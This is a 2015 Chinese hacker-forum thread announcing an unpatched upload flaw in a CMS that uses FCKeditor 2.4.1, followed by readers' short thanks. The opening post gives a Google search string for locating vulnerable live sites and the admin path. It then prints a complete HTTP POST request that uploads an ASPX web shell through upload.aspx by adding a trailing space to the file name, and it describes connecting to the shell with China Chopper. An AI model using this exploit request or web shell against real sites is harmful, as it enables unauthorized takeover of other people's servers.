查看: 99509|回复: 166

【原创】网站通CMS 0day,全版本GetShell

[复制链接]
  • TA的每日心情
    难过
    2019-5-20 22:31
  • 签到天数: 51 天

    [LV.5]常住居民I

    发表于 2015-6-10 09:09:41 | 显示全部楼层 |阅读模式
    GoogleHack:inurl:second.aspx?nodeid= filetype:aspx

    查了下还有比较多的

    后台管理URL:/console/login.aspx

    无意发现个网站,存在FCK编辑器,于是乎经行了简单的黑盒测试,首先看看FCK编辑器版本(fck_about.html)2.4.1

    Capture.PNG

    存在漏洞,下一步就是找寻上传点:尝试几个都不存在,browser.html文件访问时被重定向,直接找FCK connector文件,也被进行了权限限制。
    1.png

    这个时候想到FCK低版本通过uplaod.aspx文件也可以上传,访问/upload.aspx没有加访问限制,感觉有戏。开始构造FCK上传包,利用windows下后缀名加空格的方法上传,并成功返回了上传地址。
    2.png
    利用返回的URL,菜刀连接成功。 再测试了几个网站 ver1.0 ver2.0 都存在这个漏洞。
    3.png
    利用代码:
    [AppleScript] 纯文本查看 复制代码
    POST /FCKeditor/editor/filemanager/upload/aspx/upload.aspx?Type=File HTTP/1.1
    Host:******
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------243452243125528
    Content-Length: 262
    
    
    -----------------------------243452243125528
    Content-Disposition: form-data; name="NewFile"; filename="test.aspx "
    Content-Type: text/plain
    
    <%@ Page Language="Jscript"%><%eval(Request.Item["cc"],"unsafe");%>
    -----------------------------243452243125528--

    评分

    参与人数 5人气 +2 i币 +26 贡献 +1 收起 理由
    Evilboy + 1 支持原创
    浮尘 + 1 支持原创
    C4r1st + 10 支持原创
    以谁为师 + 1 + 5 感谢分享,楼主威武
    管理01 + 10 + 1 支持原创

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2016-10-12 19:49
  • 签到天数: 37 天

    [LV.5]常住居民I

    发表于 2015-6-10 15:54:45 | 显示全部楼层
    收藏备用
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2015-6-10 15:56:20 | 显示全部楼层
    不错哟。支持原创,站还不少呢。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-12-14 16:39
  • 签到天数: 90 天

    [LV.6]常住居民II

    发表于 2015-6-10 17:00:58 | 显示全部楼层
    收藏了,感谢楼主
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2015-6-24 08:24
  • 签到天数: 21 天

    [LV.4]偶尔看看III

    发表于 2015-6-10 21:25:04 | 显示全部楼层
    为什么提交是 HTTP Error 400. The request has an invalid header name. ???
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2015-6-11 16:55
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-6-11 17:10:47 | 显示全部楼层
    看看,学习,嘿嘿!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 16:35:21 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-6-27 18:11:50 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 18:20:04 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 23:33:44 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 13:53 , Processed in 0.027020 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部